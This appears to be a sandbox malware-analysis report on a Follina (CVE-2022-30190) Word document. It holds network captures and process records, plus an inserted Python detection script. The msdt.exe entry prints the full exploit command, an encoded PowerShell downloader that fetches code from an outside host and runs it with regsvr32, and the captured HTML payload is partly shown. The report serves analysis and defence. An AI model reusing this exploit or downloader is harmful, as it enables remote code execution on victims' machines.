SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\msdt.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):48956
Entropy (8bit):5.103589775370961
Encrypted:false
SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
MD5:310E1DA2344BA6CA96666FB639840EA9
SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
Malicious:false
Preview (CRLF/tab bytes rendered as line breaks and indentation; truncated where the report truncates it):
<?xml version="1.0"?>
<?Copyright (c) Microsoft Corporation. All rights reserved.?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">
  <xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>
  <xsl:template name="localization">
    <_locDefinition>
      <_locDefault _loc="locNone"/>
      <_locTag _loc="locData">String</_locTag>
      <_locTag _loc="locData">Font</_locTag>
      <_locTag _loc="locData">Mirror</_locTag>
    </_locDefinition>
  </xsl:template>
  ********** Images ********** -->
  <xsl:variable name="images">
    <Image id="check">res://sdiageng.dll/check.png</Image>
    <Image id="error">res://sdiageng.dll/error.png</Image>
    <Image id="info">res://sdiageng.dll/info.png</Image>
    <Image id="warning">res://sdiageng.dll/warning.png</Image>
    <Image id="expand">res://sdiageng.dll/expand.png</Image>
    <Image id="
File type:Microsoft OOXML
Entropy (8bit):7.869586027326007
TrID:
• Word Microsoft Office Open XML Format document (49504/1) 49.01%
• Word Microsoft Office Open XML Format document (43504/1) 43.07%
• ZIP compressed archive (8000/1) 7.92%
File name:doc1712.docx
File size:10142
MD5:7a91b01a037ccbfe6589161643d0a65a
SHA1:53658a5b5bc577d601e23ae77a34cb44dcba1f27
SHA256:f17f5c8eac3a18c961705a61385e1d2894cc8f22fb33aa3e076a40b826384c60
SHA512:f1accdbe0ea88f717f7473818df6ee72fc77077c1a145bb872863bb0bb681cb59b653dd6927e68fd2b9e8942b7498c5e7e8ab26c8d0aece3c9fcc21e580ad100
SSDEEP:192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ7S/bQ7dlJ78:snPj8I10lD9+2Vvxm/bqlJ78
TLSH:29229E36D65508B1CAD7A279E0AC1A19E30C41BBA37BE9CB61C663E412C86DF0F5530C
Icon Hash:74fcd0d2d6d6d0cc
Timestamp:06/07/22-17:33:41.296228
Protocol:TCP
SID:2036726
Message:ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)
Source Port:80
Dest Port:49176
Source IP:45.32.185.177
Dest IP:192.168.2.22
                                                                                                                                                                            • 45.32.185.177
                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            0192.168.2.54975445.32.185.17780C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
Jun 7, 2022 17:40:01.330207109 CEST | 722 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: 45.32.185.177

Jun 7, 2022 17:40:01.353324890 CEST | 722 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jun 2022 15:40:01 GMT
Server: Apache/2.4.48 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

Jun 7, 2022 17:40:01.618510962 CEST | 723 | OUT | HEAD /123.RES HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: 45.32.185.177

Jun 7, 2022 17:40:01.649537086 CEST | 723 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jun 2022 15:40:01 GMT
Server: Apache/2.4.48 (Ubuntu)
Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
ETag: "1701-5e0db72a43821"
Accept-Ranges: bytes
Content-Length: 5889
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Jun 7, 2022 17:40:04.830586910 CEST | 1280 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: 45.32.185.177

Jun 7, 2022 17:40:04.853727102 CEST | 1280 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jun 2022 15:40:04 GMT
Server: Apache/2.4.48 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 0
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html

Jun 7, 2022 17:40:05.484183073 CEST | 1289 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: 45.32.185.177

Jun 7, 2022 17:40:05.507391930 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jun 2022 15:40:05 GMT
Server: Apache/2.4.48 (Ubuntu)
Allow: GET,POST,OPTIONS,HEAD
Content-Length: 0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html

Jun 7, 2022 17:40:05.535316944 CEST | 1290 | OUT | HEAD /123.RES HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: 45.32.185.177

Jun 7, 2022 17:40:05.558767080 CEST | 1290 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jun 2022 15:40:05 GMT
Server: Apache/2.4.48 (Ubuntu)
Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
ETag: "1701-5e0db72a43821"
Accept-Ranges: bytes
Content-Length: 5889
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49765 | 45.32.185.177 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data

Jun 7, 2022 17:40:04.989356041 CEST | 1281 | OUT | GET /123.RES HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: 45.32.185.177
Connection: Keep-Alive

Jun 7, 2022 17:40:05.012257099 CEST | 1282 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jun 2022 15:40:04 GMT
Server: Apache/2.4.48 (Ubuntu)
Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
ETag: "1701-5e0db72a43821"
Accept-Ranges: bytes
Content-Length: 5889
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 70 3e 0d 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61 20 69 64 20 6d 6f 6c 6c 69 73 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 73 75 73 63 69 70 69 74 20 6f 72 63 69 20 6e 65 71 75 65 2c 20 61 74 20 6f 72 6e 61 72 65 20 73 61 70 69 65 6e 20 62 69 62 65 6e 64 75 6d 20 65 75 2e 20 56 65 73 74 69 62 75 6c 75 6d 20 6d 61 6c 65 73 75 61 64 61 20 6e 65 63 20 73 65 6d 20 71 75 69 73 20 66 69 6e 69 62 75 73 2e 20 4e 61 6d 20 71 75 69 73 20 6c 69 67 75 6c 61 20 65 74 20 64 75 69 20 66 61 75 63 69 62 75 73 20 66 61 75 63 69 62 75 73 2e 20 49 6e 20 71 75 69 73 20 62 69 62 65 6e 64 75 6d 20 74 6f 72 74 6f 72 2e 0d 0a 0d 0a 43 75 72 61 62 69 74 75 72 20 72 75 74 72 75 6d 20 6c 65 6f 20 74 6f 72 74 6f 72 2c 20 76 65 6e 65 6e 61 74 69 73 20 66 65 72 6d 65 6e 74 75 6d 20 65 78 20 70 6f 72 74 74 69 74 6f 72 20 76 69 74 61 65 2e 20 50 72 6f 69 6e 20 65 75 20 69 6d 70 65 72 64 69 65 74 20 6c 6f 72 65 6d 2c 20 61 63 20 61 6c 69 71 75 65 74 20 72 69 73 75 73 2e 20 41 65 6e 65 61 6e 20 65 75 20 73 61 70 69 65 6e 20 70 68 61 72 65 74 72 61 2c 20 69 6d 70 65 72 64 69 65 74 20 69 70 73 
75 6d 20 75 74 2c 20 73 65 6d 70 65 72 20 64 69 61 6d 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 53 65 64 20 65 75 69 73 6d 6f 64 20 74 6f 72 74 6f 72 20 74 6f 72 74 6f 72 2c 20 6e 6f 6e 20 65 6c 65 69 66 65 6e 64 20 6e 75 6e 63 20 66 65 72 6d 65 6e 74 75 6d 20 73 69 74 20 61 6d 65 74 2e 20 49 6e 74 65 67 65 72 20 6c 69 67 75 6c 61 20 6c 69 67 75 6c 61 2c 20 63 6f 6e 67 75 65 20 61 74 20 73 63 65 6c 65 72 69 73 71 75 65 20 73 69 74 20 61 6d 65 74 2c 20 70 6f 72 74 74 69 74 6f 72 20 71 75 69 73 20 66 65 6c 69 73 2e 20 4d 61 65 63 65 6e 61 73 20 6e 65 63 20 6a 75 73 74 6f 20 76 61 72 69 75 73 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0d 0a 0d 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69 73 20 6c 65 63 74 75 73 20 6d
                                                                                                                                                                            Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus m
Jun 7, 2022 17:40:05.012276888 CEST | 1283 | IN | Data Raw: 61 73 73 61 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 71 75 69 73 20 70 72 65 74 69 75 6d 20 6d 61 73 73 61 2e 20 56 69 76 61 6d 75 73 20 66 61 63 69 6c 69 73 69 73 20 75 6c 74 72 69 63 69 65 73 20 6d 61 73 73 61 20 61 63 20 63 6f 6d 6d 6f 64
Data Ascii: assa. Pellentesque quis pretium massa. Vivamus facilisis ultricies massa ac commodo. Nam nec congue magna. Nullam laoreet justo ut vehicula lobortis.Aliquam rutrum orci tortor, non porta odio feugiat eu. Vivamus nulla mauris, eleifend eu e

Jun 7, 2022 17:40:05.012293100 CEST | 1285 | IN | Data Raw: 20 43 75 72 61 62 69 74 75 72 20 69 6e 74 65 72 64 75 6d 2c 20 6e 69 73 6c 20 65 75 20 6c 61 6f 72 65 65 74 20 74 65 6d 70 75 73 2c 20 61 75 67 75 65 20 6e 69 73 6c 20 76 6f 6c 75 74 70 61 74 20 6f 64 69 6f 2c 20 64 69 63 74 75 6d 20 61 6c 69 71
Data Ascii: Curabitur interdum, nisl eu laoreet tempus, augue nisl volutpat odio, dictum aliquam massa orci sit amet magna.Duis pulvinar vitae neque non placerat. Nullam at dui diam. In hac habitasse platea dictumst. Sed quis mattis libero. Nullam si

Jun 7, 2022 17:40:05.012310028 CEST | 1286 | IN | Data Raw: 20 73 75 73 63 69 70 69 74 20 73 69 74 20 61 6d 65 74 20 6d 61 73 73 61 2e 20 56 69 76 61 6d 75 73 20 69 6e 20 6c 65 63 74 75 73 20 65 72 61 74 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 56 69 76 61 6d 75 73 20 73 65 64 20 6d 61 73 73
Data Ascii: suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.Morbi conval

Jun 7, 2022 17:40:05.012326956 CEST | 1287 | IN | Data Raw: 73 2e 20 55 74 20 76 65 68 69 63 75 6c 61 2c 20 6a 75 73 74 6f 20 61 63 20 70 6f 72 74 61 20 66 61 63 69 6c 69 73 69 73 2c 20 6d 69 20 73 61 70 69 65 6e 20 65 66 66 69 63 69 74 75 72 20 69 70 73 75 6d 2c 20 73 69 74 20 66 75 73 63 65 2e 0d 0a 3c
Data Ascii: s. Ut vehicula, justo ac porta facilisis, mi sapien efficitur ipsum, sit fusce.</p><script> location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Exp
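The exchange above is the whole Follina delivery in one session: WINWORD.EXE resolves the document's external reference, probes the server (OPTIONS and HEAD with the "Microsoft Office Word 2014" and "Microsoft Office Existence Discovery" agents, then a GET with the MSIE/ms-office browser agent), and receives a 5889-byte file named 123.RES that is really HTML: a lorem-ipsum body followed by a script that sets location.href to an ms-msdt: URI for the PCWDiagnostic package, whose IT_BrowseForFile parameter carries a PowerShell $( ... ) subexpression that msdt.exe evaluates. The following triage check is an added example written for this report, not Joe Sandbox code and not part of the sample: it classifies a request as an Office-originated fetch using the User-Agent strings seen in the capture, and parses a response body for that ms-msdt: pattern. SAMPLE_REQUEST and SAMPLE_BODY are constructed stand-ins, with the padding shortened and the truncated $(Invoke-Exp... command replaced by a harmless placeholder; the regexes and verdict labels are this example's own assumptions.

```python
"""Triage check for the CVE-2022-30190 (Follina) delivery seen in this capture.

Added example for this report, not Joe Sandbox code and not part of the sample.
SAMPLE_REQUEST / SAMPLE_BODY are constructed stand-ins; the real command
following $( in the capture is truncated and is replaced by a placeholder here.
"""
import re
from typing import Dict, List, Optional

# Constructed request, shaped like session 1's GET /123.RES.
SAMPLE_REQUEST = (
    "GET /123.RES HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; "
    "Trident/7.0; ms-office; MSOffice 16)\r\n"
    "Host: 45.32.185.177\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

# Constructed body, shaped like the served HTML; placeholder command only.
SAMPLE_BODY = (
    '<!doctype html>\r\n<html lang="en">\r\n<head>\r\n<title>\r\n'
    'Good thing we disabled macros\r\n</title>\r\n</head>\r\n<body>\r\n<p>\r\n'
    + "Lorem ipsum dolor sit amet, consectetur adipiscing elit. " * 100
    + '</p>\r\n<script> location.href = "ms-msdt:/id PCWDiagnostic /skip force '
    '/param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu '
    'IT_BrowseForFile=$(Write-Host constructed-placeholder)\\""; </script>\r\n'
    '</body>\r\n</html>\r\n'
)

# User-Agent markers Office uses when it HEADs/GETs an external target
# (all four appear in this capture).
OFFICE_UA_MARKERS = (
    "Microsoft Office Existence Discovery",
    "Microsoft Office Word",
    "ms-office",
    "MSOffice",
)

# ms-msdt:<args> inside a JS string literal; the match ends at the quote that
# closes location.href = "...". Escaped \" inside /param does not end it.
MSDT_RE = re.compile(r'ms-msdt:(?P<args>.*?)"\s*;', re.I | re.S)
PARAM_RE = re.compile(r'/param\s+"(?P<params>.*)"', re.S)


def office_fetch(request: str) -> Optional[Dict[str, str]]:
    """Return method, path and the matching Office UA marker, or None when the
    request did not come from an Office client."""
    lines = request.split("\r\n")
    method, _, rest = lines[0].partition(" ")
    path = rest.split(" ")[0]
    ua = next((l.split(":", 1)[1].strip() for l in lines[1:]
               if l.lower().startswith("user-agent:")), "")
    marker = next((m for m in OFFICE_UA_MARKERS if m in ua), None)
    if marker is None:
        return None
    return {"method": method, "path": path, "ua_marker": marker}


def scan_body(body: str) -> List[dict]:
    """Find ms-msdt: URIs and flag /param values that contain a PowerShell
    subexpression $( ... ). One finding per URI."""
    findings = []
    for m in MSDT_RE.finditer(body):
        args = m.group("args").replace('\\"', '"')   # undo JS string escaping
        pkg = re.search(r'/id\s+(\S+)', args)
        params: Dict[str, str] = {}
        pm = PARAM_RE.search(args)
        if pm:
            # Split before each KEY= token; values themselves may contain spaces.
            for tok in re.split(r'\s+(?=\w+=)', pm.group("params").strip()):
                key, _, val = tok.partition("=")
                params[key] = val
        injected = [k for k, v in params.items() if "$(" in v]
        findings.append({
            "package": pkg.group(1) if pkg else None,
            "params": params,
            "injected_params": injected,
            # IT_BrowseForFile is the field msdt.exe evaluates in Follina.
            "verdict": "follina" if "IT_BrowseForFile" in injected else "msdt-uri",
        })
    return findings


def triage(request: str, body: str) -> str:
    """Combine both signals: an Office client fetching a body that carries the
    Follina payload is the high-confidence case."""
    fetch = office_fetch(request)
    hits = [f for f in scan_body(body) if f["verdict"] == "follina"]
    if fetch and hits:
        return "follina-delivery"
    if hits:
        return "follina-payload"
    if fetch:
        return "office-external-fetch"
    return "clean"
```

Run triage(SAMPLE_REQUEST, SAMPLE_BODY) to see "follina-delivery". Two caveats from the capture itself: the Office agents on their own only say that Word fetched something external, which legitimate linked documents also do, so the User-Agent signal is a correlation aid rather than a verdict; and the file extension (.RES) and the Content-Type are useless as filters, since the server sends HTML under a resource-file name, which is why the check parses the body rather than trusting headers.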
Jun 7, 2022 17:40:05.202013969 CEST | 1288 | OUT | HEAD /123.RES HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 45.32.185.177
Connection: Keep-Alive

Jun 7, 2022 17:40:05.225053072 CEST | 1288 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jun 2022 15:40:05 GMT
Server: Apache/2.4.48 (Ubuntu)
Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
ETag: "1701-5e0db72a43821"
Accept-Ranges: bytes
Content-Length: 5889
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive

Jun 7, 2022 17:40:05.404911041 CEST | 1288 | OUT | HEAD /123.RES HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 45.32.185.177
Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.427958012 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:05 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 5889
                                                                                                                                                                            Keep-Alive: timeout=5, max=98
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.569519997 CEST1290OUTGET /123.RES HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            If-None-Match: "1701-5e0db72a43821"
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.592567921 CEST1291INHTTP/1.1 304 Not Modified
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:05 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Keep-Alive: timeout=5, max=97
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.607100964 CEST1291OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.630181074 CEST1291INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:05 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 5889
                                                                                                                                                                            Keep-Alive: timeout=5, max=96
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.822417021 CEST1292OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.845601082 CEST1292INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:05 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 5889
                                                                                                                                                                            Keep-Alive: timeout=5, max=95
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:09.210685015 CEST1292OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:09.233540058 CEST1293INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:09 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 5889
                                                                                                                                                                            Keep-Alive: timeout=5, max=94
                                                                                                                                                                            Connection: Keep-Alive


Target ID: 0
Start time: 17:39:53
Start date: 07/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase: 0xe90000
File size: 1937688 bytes
MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 3
Start time: 17:40:00
Start date: 07/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase: 0x1110000
File size: 466688 bytes
MD5 hash: EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 4
Start time: 17:40:00
Start date: 07/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase: 0x1110000
File size: 466688 bytes
MD5 hash: EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 9
Start time: 17:40:06
Start date: 07/06/2022
Path: C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Imagebase: 0x100000
File size: 1508352 bytes
MD5 hash: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
